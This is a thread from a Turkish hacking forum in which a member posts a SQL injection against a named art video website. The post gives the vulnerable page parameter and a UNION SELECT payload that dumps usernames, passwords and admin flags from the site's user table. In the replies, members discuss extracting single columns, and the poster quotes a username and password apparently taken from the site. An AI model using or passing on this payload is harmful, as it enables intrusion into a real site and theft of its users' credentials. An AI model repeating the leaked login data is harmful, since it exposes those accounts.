İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

http://www.sfe.tv/ SQL Injection Vulnerability

29-01-2014 19:30
#1
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.265
Teşekkür (Etti):
968
Teşekkür (Aldı):
1752
Konular:
1022
Ticaret:
(0) %
#########################################

~ Site : SOUVENIRS FROM EARTH | Art TV Station for Video Art, Film & Music

~ Date : 27.01.2014 // 19:29

~ Bug : maske.php?id=126

~ Exploit : UNION SELECT 1,2,3,group_concat(name,0x3a,pass,0x3a,admin),5,6, 7+from+user

~ Platform : Php

########################################

ZoRRoKiN & INFeRNaL & Se-zeR & GökTürk & ALcatraz'

TurkHackTeam.Net ~ ALcatraz'
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
WhooLe Teşekkür etti.

29-01-2014 22:05
#2
redmon41 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
Kocaeli
Mesajlar:
981
Teşekkür (Etti):
161
Teşekkür (Aldı):
73
Konular:
349
Ticaret:
(0) %
Başarılı tebrikler ancak baştaki amca nabıyor öyle
Kullanıcı İmzası
Benim Dedem:
Fatih Sultan Mehmet
Benim Dedem:
Sultan Selim Han
Benim Dedem:
Kanuni Sultan Süleyman

Benim Atam İse
Mustafa Kemal Atatürk
http://i.hizliresim.com/wL4nJz.jpg
29-01-2014 22:13
#3
CaDaBRa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2012
Nereden:
malatya
Mesajlar:
2.141
Teşekkür (Etti):
179
Teşekkür (Aldı):
125
Konular:
269
Ticaret:
(0) %
Keske hacklemeseydın sende herakles gıbı bıze bıraksaydın bıde bısı soracam bunu deneyerekde yapabılırım de telefondan gırdıgım ıcın soruyorum group_concat(...) yapmışsın ya oraya group_concat degılde sadece user tablosundan bır kolonun ısmını yazssan yazdıgın kolon yansırmıydı? Saol paylastıgın ıcın
29-01-2014 22:15
#4
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.265
Teşekkür (Etti):
968
Teşekkür (Aldı):
1752
Konular:
1022
Ticaret:
(0) %
Alıntı:
CaDaBRa´isimli üyeden Alıntı Mesajı göster
Keske hacklemeseydın sende herakles gıbı bıze bıraksaydın bıde bısı soracam bunu deneyerekde yapabılırım de telefondan gırdıgım ıcın soruyorum group_concat(...) yapmışsın ya oraya group_concat degılde sadece user tablosundan bır kolonun ısmını yazssan yazdıgın kolon yansırmıydı? Saol paylastıgın ıcın
Hacklemedim. + yansırdı ama tek tek mesela 1.username kolonun verisi prolexas pass kolonun verisi 123456 ama daha bir sürü var group_concat ile hepsini çekebilirsin.
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
29-01-2014 22:19
#5
CaDaBRa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2012
Nereden:
malatya
Mesajlar:
2.141
Teşekkür (Etti):
179
Teşekkür (Aldı):
125
Konular:
269
Ticaret:
(0) %
Alıntı:
ALcatraz'´isimli üyeden Alıntı Mesajı göster


Hacklemedim. + yansırdı ama tek tek mesela 1.username kolonun verisi prolexas pass kolonun verisi 123456 ama daha bir sürü var group_concat ile hepsini çekebilirsin.
Eyw. Saol tahmn ettıgm gıbı.sql ı cozecem ıns. . Hacklemedım dıon hacklemedınde bızede yapacak bısı bırakmamıssın admn panelınden baska(onu bulmakda bazen zor oluyor ) bıde sql anlatımların var orada bırsey sordum lutfen cvp ver selametle.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı